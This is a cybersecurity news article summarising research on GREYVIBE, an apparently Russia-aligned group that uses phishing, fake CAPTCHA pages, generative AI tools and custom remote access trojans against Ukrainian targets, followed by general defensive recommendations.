GREYVIBE Hackers Exploit AI Tools to Enhance Cyberattacks
The GREYVIBE hacking group has been actively leveraging advanced artificial intelligence (AI) tools, including ChatGPT and Google Gemini, to bolster their cyberattack capabilities. Since August 2025, this group has primarily targeted Ukrainian government, military, and civilian sectors, underscoring the increasing integration of AI in modern cyber warfare.
Researchers at WithSecure have identified GREYVIBE as a previously untracked threat actor exhibiting consistent patterns in infrastructure, tools, and operational behavior across multiple campaigns. While definitive attribution remains elusive, the group’s activities align closely with Russian state interests, particularly in intelligence gathering related to the Russia-Ukraine conflict. Evidence supporting this includes Russian-language artifacts, activity patterns corresponding to Moscow’s time zone, and a focus on Ukrainian institutions.
Exploitation of AI Tools
GREYVIBE employs a multifaceted attack strategy that combines spear-phishing emails, counterfeit CAPTCHA verification pages, and fraudulent websites to disseminate malware. In their spear-phishing campaigns, attackers impersonate Ukrainian government agencies, distributing malicious files via cloud services like Google Drive. These payloads execute decoy documents while covertly initiating infection chains using custom loaders.
A notable tactic involves fake CAPTCHA pages designed to deceive victims into executing malicious commands under the guise of verification steps. Additionally, the group operates deceptive adult club websites targeting Ukrainian individuals, particularly military personnel. These platforms not only deliver malware such as FallSpy for Android and PhantomRelay for Windows but also engage in social engineering through fake personas on messaging platforms like Telegram.
A key finding in the report is GREYVIBE’s systematic use of generative AI across the attack lifecycle. Tools such as ChatGPT, Google Gemini, and Ideogram AI have been reportedly used to generate phishing lures, develop malware components, and support post-compromise activities. Researchers observed AI-generated code patterns in obfuscators and loaders such as DAYLIGHT and TEASOUP, as well as in the development of LegionRelay, a custom PowerShell-based remote access trojan. This AI-assisted approach appears to help the group compensate for limited technical sophistication while accelerating development cycles. It also reduces reliance on reused code, making traditional attribution methods more difficult. However, the group’s reliance on AI has introduced flaws. WithSecure identified design weaknesses in LegionRelay that exposed backend functionality, enabling researchers to monitor attacker activity over time.
Malware Toolkit
GREYVIBE’s malware arsenal includes PhantomRelay, a modular remote access trojan (RAT) that utilizes WebSockets for command execution. This tool enables attackers to maintain persistent access to compromised systems, execute commands remotely, and exfiltrate sensitive data. The use of WebSockets allows for real-time communication between the malware and the command-and-control servers, facilitating efficient data transfer and command execution.
Another significant component is LegionRelay, a custom PowerShell-based RAT. This tool is designed to provide attackers with remote control over infected systems, allowing them to execute commands, manipulate files, and gather information. The development of LegionRelay using AI tools has enabled GREYVIBE to rapidly create and deploy this malware, demonstrating the potential for AI to accelerate the development of sophisticated cyber threats.
The group’s use of FallSpy, an Android malware, indicates a broad targeting strategy that encompasses both desktop and mobile platforms. FallSpy is designed to infiltrate Android devices, collect sensitive information, and transmit it back to the attackers. The deployment of such malware through deceptive websites and social engineering tactics highlights the multifaceted approach GREYVIBE employs to compromise targets.
Implications and Challenges
The integration of AI tools into cyberattack methodologies presents significant challenges for cybersecurity defenses. AI-generated phishing lures and malware components can be more convincing and harder to detect, increasing the success rate of attacks. Furthermore, the rapid development cycles facilitated by AI allow threat actors to adapt quickly to security measures, making traditional defense mechanisms less effective.
The use of AI also complicates attribution efforts. AI-generated code can lack the distinct signatures typically used to identify and track threat actors, making it more difficult for researchers to link attacks to specific groups. This anonymity can embolden attackers, knowing that their activities are less likely to be traced back to them.
However, the reliance on AI is not without its drawbacks for attackers. As demonstrated by the design flaws in LegionRelay, the use of AI can introduce vulnerabilities that can be exploited by defenders. By identifying and understanding these weaknesses, cybersecurity professionals can develop strategies to detect and mitigate AI-assisted attacks.
Recommendations for Defense
To counter the evolving threat landscape shaped by AI-assisted cyberattacks, organizations should consider the following measures:
1. Enhanced Phishing Awareness Training: Educate employees about the sophisticated nature of AI-generated phishing attempts and the importance of scrutinizing unexpected communications.
2. Advanced Threat Detection Systems: Implement security solutions that utilize machine learning and behavioral analysis to detect anomalies indicative of AI-generated threats.
3. Regular Security Audits: Conduct frequent assessments of security infrastructure to identify and address potential vulnerabilities that could be exploited by AI-assisted attacks.
4. Incident Response Planning: Develop and regularly update incident response plans to ensure swift and effective action in the event of a security breach.
5. Collaboration and Information Sharing: Engage with industry peers and cybersecurity organizations to share intelligence on emerging threats and effective defense strategies.
By adopting these measures, organizations can enhance their resilience against the sophisticated and rapidly evolving threats posed by groups like GREYVIBE.
